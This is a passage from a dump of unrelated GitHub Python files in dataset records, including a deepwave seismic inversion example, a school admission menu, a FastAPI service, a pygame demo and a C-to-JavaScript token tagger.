from itertools import permutations\n# for i in permutations(list('123')):\n# print(i)","repo_name":"Sachin0796/DSA","sub_path":"Recursion/permutations.py","file_name":"permutations.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8424370327","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"pl_analysis\", # Replace with your own username\n version=\"0.0.5\",\n author=\"Maximilian Grove\",\n author_email=\"m_grov01@uni-muenster.de\",\n description=\"Plasmon loss analysis by 2D - or 3D - (stack) images of EELS spectra\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/mgrove-wwu/EELS-LL-image-fitting\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.6',\n)","repo_name":"mgrove-wwu/EELS-LL-image-fitting","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"32740420791","text":"f = open('17-281.txt')\ns = f.readlines()\na = []\nfor i in s:\n a.append(int(i))\nsum7 = 0\nminsum = 10000\nk = 0\nfor j in range(len(a)):\n sum7 = oct(j)[2:].count('7') + sum7\nfor m in range(len(a)-1):\n if a[ m] > sum7 and a[m+1] > sum7:\n k += 1\n if a[ m] + a[m+1] < minsum:\n minsum = a[ m] + a[m+1]\nprint(k, minsum)","repo_name":"anastasu/17Zzadanie","sub_path":"5019.py","file_name":"5019.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9852410622","text":"import os\nimport torch\nfrom torchaudio.functional import biquad\nimport torch.distributed as dist\nimport torch.multiprocessing as mp\nfrom torch.nn.parallel import DistributedDataParallel as DDP\nfrom scipy.ndimage import gaussian_filter\nfrom scipy.signal import butter\nimport matplotlib.pyplot as plt\nimport deepwave\nfrom deepwave import scalar\n\n\ndef setup(rank, world_size):\n os.environ['MASTER_ADDR'] = 'localhost'\n os.environ['MASTER_PORT'] = '12355'\n\n # initialize the process group\n dist.init_process_group(\"nccl\", rank=rank, world_size=world_size)\n torch.cuda.set_device(rank)\n\n\ndef cleanup():\n dist.destroy_process_group()\n\n\n# Generate a velocity model constrained to be within a desired range\nclass Model(torch.nn.Module):\n def __init__(self, initial, min_vel, max_vel):\n super().__init__()\n self.min_vel = min_vel\n self.max_vel = max_vel\n self.model = torch.nn.Parameter(\n torch.logit((initial - min_vel) /\n (max_vel - min_vel))\n )\n\n def forward(self):\n return (torch.sigmoid(self.model) *\n (self.max_vel - self.min_vel) +\n self.min_vel)\n\n\nclass Prop(torch.nn.Module):\n def __init__(self, model, dx, dt, freq):\n super().__init__()\n self.model = model\n self.dx = dx\n self.dt = dt\n self.freq = freq\n\n def forward(self, source_amplitudes, source_locations,\n receiver_locations):\n v = self.model()\n return scalar(\n v, self.dx, self.dt,\n source_amplitudes=source_amplitudes,\n source_locations=source_locations,\n receiver_locations=receiver_locations,\n max_vel=2500,\n pml_freq=self.freq,\n time_pad_frac=0.2,\n )\n\n\ndef run_rank(rank, world_size):\n print(f\"Running DDP on rank {rank} / {world_size}.\")\n setup(rank, world_size)\n ny = 2301\n nx = 751\n dx = 4.0\n v_true = torch.from_file('marmousi_vp.bin',\n size=ny*nx).reshape(ny, nx)\n\n # Select portion of model for inversion\n ny = 600\n nx = 250\n v_true = v_true[:ny, :nx]\n\n # Smooth to use as starting model\n v_init = torch.tensor(1/gaussian_filter(1/v_true.numpy(), 40))\n\n n_shots = 115\n\n n_sources_per_shot = 1\n d_source = 20 # 20 * 4m = 80m\n first_source = 10 # 10 * 4m = 40m\n source_depth = 2 # 2 * 4m = 8m\n\n n_receivers_per_shot = 384\n d_receiver = 6 # 6 * 4m = 24m\n first_receiver = 0 # 0 * 4m = 0m\n receiver_depth = 2 # 2 * 4m = 8m\n\n freq = 25\n nt = 750\n dt = 0.004\n peak_time = 1.5 / freq\n\n observed_data = (\n torch.from_file('marmousi_data.bin',\n size=n_shots*n_receivers_per_shot*nt)\n .reshape(n_shots, n_receivers_per_shot, nt)\n )\n\n def taper(x):\n # Taper the ends of traces\n return deepwave.common.cosine_taper_end(x, 100)\n\n # Select portion of data for inversion\n n_shots = 16\n n_receivers_per_shot = 100\n nt = 300\n observed_data = (\n taper(observed_data[:n_shots, :n_receivers_per_shot, :nt])\n )\n\n # source_locations\n source_locations = torch.zeros(n_shots, n_sources_per_shot, 2,\n dtype=torch.long)\n source_locations[..., 1] = source_depth\n source_locations[:, 0, 0] = (torch.arange(n_shots) * d_source +\n first_source)\n\n # receiver_locations\n receiver_locations = torch.zeros(n_shots, n_receivers_per_shot,\n 2, dtype=torch.long)\n receiver_locations[..., 1] = receiver_depth\n receiver_locations[:, :, 0] = (\n (torch.arange(n_receivers_per_shot) * d_receiver +\n first_receiver)\n .repeat(n_shots, 1)\n )\n\n # source_amplitudes\n source_amplitudes = (\n (deepwave.wavelets.ricker(freq, nt, dt, peak_time))\n .repeat(n_shots, n_sources_per_shot, 1)\n )\n\n observed_data = \\\n torch.chunk(observed_data, world_size)[rank].to(rank)\n source_amplitudes = \\\n torch.chunk(source_amplitudes, world_size)[rank].to(rank)\n source_locations = \\\n torch.chunk(source_locations, world_size)[rank].to(rank)\n receiver_locations = \\\n torch.chunk(receiver_locations, world_size)[rank].to(rank)\n\n model = Model(v_init, 1000, 2500)\n prop = Prop(model, dx, dt, freq).to(rank)\n prop = DDP(prop, device_ids=[rank])\n\n # Setup optimiser to perform inversion\n loss_fn = torch.nn.MSELoss()\n\n # Run optimisation/inversion\n n_epochs = 2\n\n for cutoff_freq in [10, 15, 20, 25, 30]:\n sos = butter(6, cutoff_freq, fs=1/dt, output='sos')\n sos = [torch.tensor(sosi).to(observed_data.dtype).to(rank)\n for sosi in sos]\n\n def filt(x):\n return biquad(biquad(biquad(x, *sos[0]), *sos[1]),\n *sos[2])\n observed_data_filt = filt(observed_data)\n optimiser = torch.optim.LBFGS(prop.parameters())\n for epoch in range(n_epochs):\n def closure():\n optimiser.zero_grad()\n out = prop(source_amplitudes, source_locations,\n receiver_locations)\n out_filt = filt(taper(out[-1]))\n loss = 1e6*loss_fn(out_filt, observed_data_filt)\n loss.backward()\n return loss\n\n optimiser.step(closure)\n\n # Plot\n if rank == 0:\n v = model()\n vmin = v_true.min()\n vmax = v_true.max()\n _, ax = plt.subplots(3, figsize=(10.5, 10.5), sharex=True,\n sharey=True)\n ax[0].imshow(v_init.cpu().T, aspect='auto', cmap='gray',\n vmin=vmin, vmax=vmax)\n ax[0].set_title(\"Initial\")\n ax[1].imshow(v.detach().cpu().T, aspect='auto', cmap='gray',\n vmin=vmin, vmax=vmax)\n ax[1].set_title(\"Out\")\n ax[2].imshow(v_true.cpu().T, aspect='auto', cmap='gray',\n vmin=vmin, vmax=vmax)\n ax[2].set_title(\"True\")\n plt.tight_layout()\n plt.savefig('example_distributed_ddp.jpg')\n\n v.detach().cpu().numpy().tofile('marmousi_v_inv.bin')\n cleanup()\n\n\ndef run(world_size):\n\n mp.spawn(run_rank,\n args=(world_size,),\n nprocs=world_size,\n join=True)\n\n\nif __name__ == \"__main__\":\n n_gpus = torch.cuda.device_count()\n run(n_gpus)\n","repo_name":"ar4/deepwave","sub_path":"docs/example_distributed_ddp.py","file_name":"example_distributed_ddp.py","file_ext":"py","file_size_in_byte":6442,"program_lang":"python","lang":"en","doc_type":"code","stars":146,"dataset":"github-code","pt":"21"} +{"seq_id":"30137830144","text":"import sys\n\nimport mcpi.block\nimport mcpi.minecraft\n\nfrom mcthings.server import Server\nfrom mcthings.world import World\n\nfrom mcthings_extra.stairs_snail import StairsSnail\n\nBUILDER_NAME = \"ElasticExplorer\"\n\nMC_SEVER_HOST = \"localhost\"\nMC_SEVER_PORT = 4711\n\n\ndef main():\n try:\n World.connect(Server(MC_SEVER_HOST, MC_SEVER_PORT))\n\n World.server.postToChat(\"Building stairs\")\n pos = World.server.entity.getTilePos(World.server.getPlayerEntityId(BUILDER_NAME))\n pos.z -= 1\n\n stairs = StairsSnail(pos)\n stairs.sections = 4\n stairs.steps = 2\n stairs.width = 3\n stairs.block = mcpi.block.IRON_BLOCK\n stairs.build()\n\n World.server.entity.setTilePos(World.server.getPlayerEntityId(BUILDER_NAME),\n stairs.end_position)\n\n except mcpi.connection.RequestError:\n print(\"Can't connect to Minecraft server \" + MC_SEVER_HOST)\n\n\nif __name__ == \"__main__\":\n main()\n sys.exit(0)\n","repo_name":"Voxelers/mcthings_extra","sub_path":"tests/stairs_snail.py","file_name":"stairs_snail.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"19251486322","text":"import main_menu\r\nimport admission\r\ndef ADM_MENU( ):\r\n while True:\r\n #admission menu:-\r\n print(\"*********************************************************************************\")\r\n print(\"* SCHOOL MANAGEMENT SYSTEM *\")\r\n print(\"*********************************************************************************\")\r\n print(\"**-----------ADMISSION-----------**\")\r\n print(\" 1. Admission details :- \")\r\n print(\" 2. Show Admission Details:- \")\r\n print(\" 3. Update Admission Details :- \")\r\n print(\" 4. Search student record :- \")\r\n print(\" 5. Deletion of Records :- \")\r\n print(\" 6. Return :- \")\r\n print(\"---------------------------------------\")\r\n print(\" \")\r\n a=int(input(\"Input your Choice:- \"))\r\n if a==1:\r\n admission.admin_details()\r\n elif a==2:\r\n admission.show_admin_details()\r\n elif a==3:\r\n admission.update_admin_details()\r\n elif a==4:\r\n admission.search_admin_details()\r\n elif a==5:\r\n admission.delete_admin_details()\r\n elif a==6:\r\n return\r\n else:\r\n print(\"EROOR: Invalid choice ,try again...\")\r\n conti=\"Press any key to return to main menu..\"\r\ndef admin_details( ):\r\n try:\r\n import pickle\r\n stu={}\r\n stufile=open(\"stu.dat\",\"wb\")\r\n ans=\"y\"\r\n while ans==\"y\":\r\n admno=int(input(\"Admission no:-\"))\r\n name=input(\"Name\")\r\n clas=int(input(\"Class:-\"))\r\n fn=input(\"Fathers name:-\")\r\n mn=input(\"Mothers name:-\")\r\n dob=input(\"Date of birth:-\")\r\n add=input(\"Address:-\")\r\n mobno=int(input(\"Mobile no. :-\"))\r\n stu[\"Admission no\"]=admno\r\n stu[\"Name\"]=name\r\n stu[\"Class\"]=clas\r\n stu[\"Fathers name\"]=fn\r\n stu[\"Mothers name\"]=mn\r\n stu[\"Date of birth\"]=dob\r\n stu[\"Address\"]=add\r\n stu[\"Mobile number\"]=mobno\r\n pickle.dump(stu,stufile)\r\n ans=input(\"wants to enter more records?(y/n):-\")\r\n stufile.close()\r\n except:\r\n print(\"ERROR\")\r\ndef show_admin_details( ):\r\n import pickle\r\n emp={}\r\n empfile=open(\"stu.dat\",\"rb\")\r\n try:\r\n while True:\r\n emp=pickle.load(empfile)\r\n print(emp)\r\n except:\r\n empfile.close()\r\ndef update_admin_details( ):\r\n import pickle\r\n stu={}\r\n f=False\r\n upd=open(\"stu.dat\",\"rb+\")\r\n try:\r\n while True:\r\n r=upd.tell()\r\n stu=pickle.load(upd)\r\n y=int(input(\"admisssion no\"))\r\n z=input(\"name\")\r\n za=input(\"Class\")\r\n if stu[\"Admission no\"]==y:\r\n stu[\"Name\"]=z\r\n upd.seek(r)\r\n pickle.dump(stu,upd)\r\n stu[\"Class\"]\r\n upd.seek(r)\r\n pickle.dump(stu,upd)\r\n f=True\r\n except:\r\n if f==False:\r\n print(\"sorry,no matching record file found.\")\r\n else:\r\n print(\"Record successfuly updated\")\r\n upd.close()\r\ndef search_admin_details( ):\r\n import pickle\r\n stu={}\r\n f=False\r\n fin=open(\"stu.dat\",\"rb\")\r\n a=int(input(\"enter admission no.:-\"))\r\n sk=[a]\r\n try:\r\n while True:\r\n stu=pickle.load(fin)\r\n if stu[\"Admission no\"] in sk:\r\n print(stu)\r\n f=True\r\n except:\r\n if f==False:\r\n print(\"No such records found in the file\")\r\n else:\r\n print(\"search successful.\")\r\n fin.close()\r\ndef delete_admin_details( ):\r\n import pickle as p\r\n import os\r\n f=False\r\n f1=open(\"stu.dat\",\"rb\")\r\n f2=open(\"temp.dat\",\"wb\")\r\n adm=int(input(\"enter admission no.\"))\r\n while True:\r\n try:\r\n d=p.load(f1)\r\n if adm==d[\"Admission no\"]:\r\n f=True\r\n else:\r\n p.dump(d,f2)\r\n except:\r\n break\r\n if f==False:\r\n print(\"record not found!!\")\r\n else:\r\n print(\"record found and deleted\")\r\n f1.close()\r\n f2.close()\r\n import pickle\r\n emp={}\r\n empfile=open(\"temp.dat\",\"rb\")\r\n try:\r\n while True:\r\n emp=pickle.load(empfile)\r\n print(emp)\r\n except:\r\n empfile.close()\r\n\r\n \r\n \r\n \r\n","repo_name":"Vivekkmaury/Python-Project2","sub_path":"admission.py","file_name":"admission.py","file_ext":"py","file_size_in_byte":4744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"783737767","text":"from importlib.metadata import metadata, version\n\nfrom fastapi import FastAPI\nfrom safir.dependencies.arq import arq_dependency\nfrom safir.dependencies.db_session import db_session_dependency\nfrom safir.dependencies.http_client import http_client_dependency\nfrom safir.logging import configure_logging, configure_uvicorn_logging\nfrom safir.middleware.x_forwarded import XForwardedMiddleware\n\nfrom .config import config\nfrom .routers import campaigns, groups, index, productions, steps\n\n__all__ = [\"app\", \"config\"]\n\n\nconfigure_logging(profile=config.profile, log_level=config.log_level, name=config.logger_name)\nconfigure_uvicorn_logging(config.log_level)\n\n\ntags_metadata = [\n {\n \"name\": \"Productions\",\n \"description\": \"Operations with `production`s. A `production` is a container for `campaign`s. \"\n \"`production`s must be uniquely named.\",\n },\n {\n \"name\": \"Campaigns\",\n \"description\": \"Operations with `campaign`s. A `campaign` consists of several processing `step`s \"\n \"which are run sequentially. A `campaign` also holds configuration such as a URL for a butler repo \"\n \"and a production area. `campaign`s must be uniquely named withing a given `production`.\",\n },\n {\n \"name\": \"Steps\",\n \"description\": \"Operations with `step`s. A `step` consists of several processing `group`s which \"\n \"may be run in parallel. `step`s must be uniquely named within a give `campaign`.\",\n },\n {\n \"name\": \"Groups\",\n \"description\": \"Operations with `groups`. A `group` can be processed in a single `workflow`, \"\n \"but we also need to account for possible failures. `group`s must be uniquely named within a \"\n \"given `step`.\",\n },\n]\n\napp = FastAPI(\n title=\"cm-service\",\n description=metadata(\"lsst-cm-service\")[\"Summary\"],\n version=version(\"lsst-cm-service\"),\n openapi_url=f\"{config.prefix}/openapi.json\",\n openapi_tags=tags_metadata,\n docs_url=f\"{config.prefix}/docs\",\n redoc_url=f\"{config.prefix}/redoc\",\n)\n\"\"\"The main FastAPI application for cm-service.\"\"\"\n\napp.add_middleware(XForwardedMiddleware)\n\napp.include_router(index.router)\napp.include_router(productions.router, prefix=config.prefix)\napp.include_router(campaigns.router, prefix=config.prefix)\napp.include_router(steps.router, prefix=config.prefix)\napp.include_router(groups.router, prefix=config.prefix)\n\n\n@app.on_event(\"startup\")\nasync def startup_event() -> None:\n await db_session_dependency.initialize(config.database_url, config.database_password)\n assert db_session_dependency._engine is not None\n db_session_dependency._engine.echo = config.database_echo\n await arq_dependency.initialize(mode=config.arq_mode, redis_settings=config.arq_redis_settings)\n\n\n@app.on_event(\"shutdown\")\nasync def shutdown_event() -> None: # pragma: no cover\n await db_session_dependency.aclose()\n await http_client_dependency.aclose()\n","repo_name":"lsst-dm/cm-service","sub_path":"src/lsst/cmservice/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30132173167","text":"import pygame\r\nimport random\r\n\r\nWIDTH = 600 #width of our game window\r\nHEIGHT = 480 #height of our game window\r\nFPS = 60\r\n\r\n#Colors\r\nBLACK = (0, 0, 0)\r\nWHITE = (255, 255, 255)\r\nRED = (255, 0, 0)\r\nGREEN = (0, 255, 0)\r\nBLUE = (0, 0, 255)\r\nPURPLE = (115, 0, 195)\r\nPINK = (205, 0, 102)\r\nlight_blue = (65, 105, 255)\r\nclass Player(pygame.sprite.Sprite):\r\n def __init__(self):\r\n pygame.sprite.Sprite.__init__(self)\r\n self.image = pygame.Surface((50,40))\r\n self.image.fill(light_blue)\r\n self.rect = self.image.get_rect()\r\n self.rect.center = (WIDTH/2, HEIGHT/2)\r\n def update(self):\r\n self.rect.y += 10\r\n if self.rect.left > WIDTH:\r\n self.rect.right = 0\r\n if self.rect.top > HEIGHT:\r\n self.rect.bottom = 0\r\n\r\n#Initialize and create game window\r\n\r\npygame.init()\r\npygame.mixer.init() #initializes sound\r\nscreen = pygame.display.set_mode((WIDTH, HEIGHT)) #create screen\r\npygame.display.set_caption(\"Game\") #give game a name\r\nclock = pygame.time.Clock() #keep track of speed/time\r\n\r\nall_sprites = pygame.sprite.Group()\r\nplayer = Player()\r\nall_sprites.add(player)\r\n\r\n\r\n#Game Loop\r\nrunning = True\r\nwhile running:\r\n clock.tick(FPS) #keep the loop running at the right speed\r\n #Process Inputs (events)\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n running = False\r\n \r\n #Updates\r\n all_sprites.update()\r\n #Renders (draws)\r\n screen.fill(PURPLE)\r\n all_sprites.draw(screen)\r\n #after drawing everything, flip the display\r\n pygame.display.flip()\r\npygame.quit()\r\n\r\n","repo_name":"BlueCharizards/Oh-look-it-s-a-website2","sub_path":"gamething.py","file_name":"gamething.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19136383909","text":"import os\nimport tempfile\n\nimport pytest\n\nimport api\n\n\n@pytest.fixture\ndef app():\n db_file, db_path = tempfile.mkstemp()\n app = api.create_app({'TESTING': True, 'DATABASE': db_path})\n\n with app.app_context(), open(os.path.join(os.path.dirname(__file__), 'data.sql'), 'rb') as f:\n api.db.init_db()\n with api.db.cursor() as cur:\n cur.executescript(f.read().decode('utf8'))\n\n yield app\n os.close(db_file)\n os.unlink(db_path)\n\n\n@pytest.fixture\ndef client(app):\n return app.test_client()\n","repo_name":"edmonl/texadaprods","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5055237277","text":"import re\nimport tokens as tkn\n\nfrom taggedtoken import TaggedToken\nfrom taggedstatement import TaggedStatement\n\nRULE_ALPHANUM = re.compile(r\"^\\w+$\")\nRULE_DIGIT = re.compile(r\"^\\d+$\")\nRULE_WHITESPACE = re.compile(r\"^\\s+$\")\n\nclass POSTagger:\n\n def _break_apart(self, string):\n \"\"\"\n Splits and returns valid symbol tokens from a string of symbol characters.\n Unknown symbols will be treated as single-character token.\n\n For example, \"++);\" would return [\"++\", \")\", \";\"]\n \"\"\"\n result = []\n while len(string) > 0:\n\n #If the string starts with a sequence of known token, e.g ++, +=, cut as needed.\n #Otherwise treat the first character as a standalone symbol.\n for token in tkn.multichar_symbol:\n if(string.startswith(token)):\n cut_len = len(token)\n break\n else:\n cut_len = 1\n\n next_token, string = string[:cut_len], string[cut_len:]\n result.append(next_token)\n\n return result\n\n def _floatify(self, tokens):\n \"\"\"\n Merges every [digit, dot, digit] or [digit, dot] token sequence into one floating-point token.\n \"\"\"\n index = 0\n last_check = len(tokens) - 1 #Check until there is at least one remaining tokens.\n result = []\n\n #Check until the last two tokens. (Checking further than this will cause index error :) )\n while index < last_check:\n #Merge dots of floating-point numbers (e.g \"3.\", \"4.14\")\n if tokens[index+1] == \".\" and RULE_DIGIT.match(tokens[index]):\n #At this point, there's a number followed by a dot.\n to_join = 2 #Number of token to join\n if (index+2 < len(tokens)) and RULE_DIGIT.match(tokens[index+2]):\n #If the dot is in turn followed by a digit, assume that it's the decimal part of the float\n to_join = 3\n\n result.append(\"\".join(tokens[index:index+to_join]))\n index += to_join\n #Merge dots of library names in include statements.\n elif tokens[0] == \"#\" and tokens[1] == tkn.include_kw and tokens[index+1] == \".\":\n result.append(\"\".join(tokens[index:index+3]))\n index += 3 \n else:\n result.append(tokens[index])\n index += 1\n\n #After the checking is done, append the remaining last three tokens.\n while index < len(tokens):\n result.append(tokens[index])\n index += 1\n\n return result\n\n def _has_dot(self, tokens):\n \"\"\"Returns True for any dot in tokens\"\"\"\n return '.' in tokens\n\n def _has_quote(self, tokens):\n \"\"\"Returns True for any single or double quote in tokens\"\"\"\n return '\"' in tokens or \"'\" in tokens\n\n def _match(self, token):\n \"\"\"Determines the tag of the respective token (according to the token dictionary constants)\"\"\"\n token_dicts = [tkn.arithmetic_operator, tkn.bitwise_operator, tkn.relational_operator, \n tkn.compound_assignment_operator, tkn.logical_operator, tkn.misc_operator, tkn.comments, \n tkn.conditionals, tkn.datatypes, tkn.loops, tkn.special_functions, tkn.keywords]\n\n for token_dict in token_dicts:\n for key, value in token_dict.items():\n if token == value:\n return key\n \n return \"unknown\"\n\n def _measure_string(self, text):\n \"\"\"\n Returns an index in which the first string in the text ends. Returns -1 if no string are ending.\n (The text parameter must start with either single or double quotes)\n \"\"\"\n \n #Do a sanity check; is the text really a string?\n if(not self._starts_with(tkn.string_identifiers, text)):\n print(f\"ERROR! The text ({text}) is not a string, but skip_text() is called on it.\")\n return -1\n\n #What we're looking for is either single or double token; check the first character to determine which.\n cur_string_delimiter = text[0]\n found = False\n idx = -1\n\n #Start from one to account for the first character (the first single/double quote)\n for idx, char in enumerate(text[1:], 1):\n #If the current token is the same as the one starting the string\n #(either single or double quote)\n if char == cur_string_delimiter:\n #If the last character in current string is backslash, it means\n #that the delimiter is escaped; continue.\n if text[idx-1] == \"\\\\\":\n pass\n #else it means that the current string is ending. Break from loop\n else:\n found = True\n break\n \n return idx if found else -1\n\n def _rebuild(self, tokens):\n \"\"\"\n Accepts these as parameter:\n 1. List of tokenized single or multi-line comment.\n 2. List of tokenized statement containing single or double quotes.\n 3. List of tokenized statement containing dots.\n\n Returns the same list, but with some parts merged (when needed)\n \"\"\"\n if self._starts_with(tkn.single_comment, tokens):\n return [tokens[0], \"\".join(tokens[1:])] \n elif self._starts_with(tkn.multi_comment, tokens):\n return [tokens[0], \"\".join(tokens[1:-1]), tokens[-1]]\n else:\n #If it's not a comment statement, assume it's a statement containing a string or dots.\n if self._has_quote(tokens): \n tokens = self._stringify(tokens) \n \n if self._has_dot(tokens):\n tokens = self._floatify(tokens)\n\n return tokens\n\n def _split(self, text, preserve_whitespace=False):\n \"\"\"\n Splits a given string into strings of whitespace, alphanumeric, and valid symbol tokens in C.\n If preserve_whitespace is set to True, all whitespaces will be treated as tokens; \n otherwise whitespaces will be skipped.\n \"\"\"\n\n splitter = re.compile(r\"(\\w+|\\s+)\")\n \n result = []\n\n #Filter empty tokens, and loop through it.\n for token in filter(lambda token: len(token) > 0, splitter.split(text)):\n if RULE_WHITESPACE.match(token):\n if preserve_whitespace:\n result.append(token)\n elif RULE_ALPHANUM.match(token):\n result.append(token)\n #it's neither alphanumeric or whitespace, assume it's a symbol string.\n else:\n result.extend(self._break_apart(token))\n\n return result\n\n def _starts_with(self, tokens, statement):\n \"\"\"\n Returns True if the list of A template function to check if a statement (either as a string or a list of string)\n starts with the tokens variable (tokens might be a dict, list, or string)\n \"\"\"\n if isinstance(statement, list):\n start_token = None\n if statement:\n start_token = statement[0]\n return start_token in tokens\n elif isinstance(statement, str):\n return True in (statement.startswith(token) for token in tokens)\n else:\n raise ValueError(\"Statement is neither a list or string object\")\n\n def _stringify(self, tokens):\n \"\"\"\n Merges every tokens between single or double quotes (including the quotes) into one. \n Leave the rest as it is, except that whitespaces outside quotes is removed.\n \n Will handle escaped quotes correctly, but fails silently if there is non-even number of quotes \n (the last quote and all quote afterwards will be dumped)\n \"\"\"\n\n limit = -1\n result_tokens = []\n\n for idx, token in enumerate(tokens):\n #Do nothing if the token is inside of a string's range, OR it's only whitespace.\n if idx < limit or RULE_WHITESPACE.match(token):\n pass\n elif token == \"'\" or token == '\"':\n str_length = self._measure_string(tokens[idx:])\n limit = idx + str_length + 1 #Extra 1 is the offset of single/double quotes\n result_tokens.append(\"\".join(tokens[idx:limit]))\n else:\n result_tokens.append(token)\n \n return result_tokens\n\n def tag(self, statement):\n \"\"\"Tokenizes and tags each token from the statement. Returns a TaggedStatement object\"\"\"\n\n id_int = re.compile(r\"^\\d+$\")\n id_float = re.compile(r\"^\\d+\\.(\\d+)?$\")\n id_var = re.compile(r\"^[A-Za-z_][A-Za-z0-9_]*$\")\n id_char = re.compile(r\"^'.*'$\", re.DOTALL)\n id_string = re.compile(r'^\".*\"$', re.DOTALL)\n\n tokens = self.tokenize(statement)\n \n #This only matches known tokens\n matched_tokens = TaggedStatement([TaggedToken(token, self._match(token)) for token in tokens])\n\n #While this match the rest (\"dynamic\" tokens)\n for idx, token in enumerate(matched_tokens):\n if token.tag == \"unknown\":\n token_str = token.token\n #Match library names (stdio.h, conio.h)\n if token_str.lower().endswith(\".h\"):\n token.tag = tkn.tag_name_preproc\n #Match integers (1234, 5454, 5)\n elif id_int.match(token_str):\n token.tag = tkn.tag_val_int\n #Match floating-point (1.1, 3.14, 2.)\n elif id_float.match(token_str):\n token.tag = tkn.tag_val_float\n #Match variable names (x, result, _hero9, y2)\n elif id_var.match(token_str):\n token.tag = tkn.tag_name_var\n #Match characters ('a', 'b')\n elif id_char.match(token_str):\n token.tag = tkn.tag_val_char\n #Match strings (\"abc\", \"def\")\n elif id_string.match(token_str):\n token.tag = tkn.tag_val_string\n\n #Match comment string (comments doesn't have any pattern, match based on position of comment tags)\n if idx == 1:\n prev_token = matched_tokens[0].tag\n if prev_token == tkn.tag_single_comment or prev_token == tkn.tag_multi_comment:\n token.tag = \"comment\"\n \n return matched_tokens\n\n def tokenize(self, statement):\n \"\"\"\n Tokenizes C statement given as parameter into tagging-ready tokens.\n \"\"\"\n\n #If there's quote in the statement, or it's a comment statement, set as True.\n is_ws_sensitive = (self._has_quote(statement) or \n self._starts_with([tkn.single_comment, tkn.multi_comment], statement)) \n tokens = self._split(statement, preserve_whitespace=is_ws_sensitive)\n\n if is_ws_sensitive or self._has_dot(statement):\n tokens = self._rebuild(tokens)\n\n return tokens\n ","repo_name":"ryanfadholi/c2js-rbmt","sub_path":"postagger.py","file_name":"postagger.py","file_ext":"py","file_size_in_byte":11111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"44126160951","text":"#!/usr/bin/python\r\nimport os\r\nimport sys\r\nimport numpy as np\r\nimport torch\r\nfrom torch.utils.data.dataset import Dataset\r\nfrom PIL import Image\r\n\r\n\r\ndef FindErrPots(array):\r\n ashape = array.shape \r\n out2 = []\r\n out0 = []\r\n for i in range(ashape[0]):\r\n for j in range(ashape[1]):\r\n if 2 == array[i][j]:\r\n out2.append([i, j])\r\n #icout2 += 1\r\n elif 0 == array[i][j]:\r\n out0.append([i, j])\r\n #icout0 += 1\r\n return np.array(out0), np.array(out2)\r\n\r\ndef redefPixel2(d_coord, labels):\r\n for i in d_coord:\r\n ic = 0\r\n for j in range(11):\r\n if labels[j,i[0],i[1]] and 0 == ic:\r\n labels[j,i[0],i[1]] = True\r\n ic += 1\r\n else:\r\n labels[j,i[0],i[1]] = False\r\n return labels\r\n\r\ndef redefPixl0(z_coord, labels): #sumlabels\r\n for i in z_coord:\r\n if i[0] < 127 and labels[i[0] + 1][i[1]] != 0:\r\n labels[i[0]][i[1]] = labels[i[0] + 1][i[1]]\r\n else:\r\n if 0 != labels[i[0] - 1][i[1]]:\r\n labels[i[0]][i[1]] = labels[i[0] - 1][i[1]]\r\n else:\r\n labels[i[0]][i[1]] = 1\r\n return labels\r\n\r\ndef loadLabels(ldir, idir):\r\n out = []\r\n for i, it in enumerate(ldir):\r\n img = Image.open(idir + it.strip('\\r\\n'))\r\n img = img.convert('1')\r\n out.append(np.array(img.resize((128, 128))))\r\n return np.array(out)\r\n\r\ndef Tomask(ldir, idir):#[11, 16, 16]\r\n #summ = labels.sum(axis = 0)\r\n labels = loadLabels(ldir, idir)\r\n iniSum = labels.sum(axis = 0)\r\n z_coord, a_coord = FindErrPots(iniSum)\r\n #print('------------------------------------',labels.shape)\r\n dst_label = redefPixel2(a_coord, labels)\r\n reSum = dst_label.sum(axis = 0)\r\n \r\n #print(dst_label.shape)\r\n summ = dst_label[1] * 1+ dst_label[2] * 2 + dst_label[3] * 3 + dst_label[4] * 4 + \\\r\n dst_label[5] * 5 + dst_label[6] * 6 + dst_label[7] * 7 + dst_label[8] * 8 + dst_label[9] * 9 + dst_label[10] * 10\r\n dst = redefPixl0(z_coord, summ)\r\n for i in range(len(dst)):\r\n \tfor j in range(len(dst[i])):\r\n \t\tif dst[i][j] > 10:\r\n \t\t\tdst[i][j] = 10\r\n\r\n return np.array(dst)\r\n\r\n\r\nclass dLoader(Dataset):\r\n \"\"\"docstring for dLoader\"\"\"\r\n def __init__(self, img_size, Img_txt_path, Label_dir, Label_img_path, transform = None):\r\n # read imgs path/file_names\r\n self.transform = transform\r\n img_paths = []\r\n with open(Img_txt_path) as ff:\r\n for line in ff:\r\n img_paths.append(line.strip('\\r\\n'))\r\n\r\n #read label imgs\r\n label_txt_path = os.listdir(Label_dir)\r\n full_labels = []\r\n for line in label_txt_path:\r\n with open(Label_dir + line) as ff:\r\n pngs = []\r\n for lab in ff:\r\n pngs.append(lab)\r\n 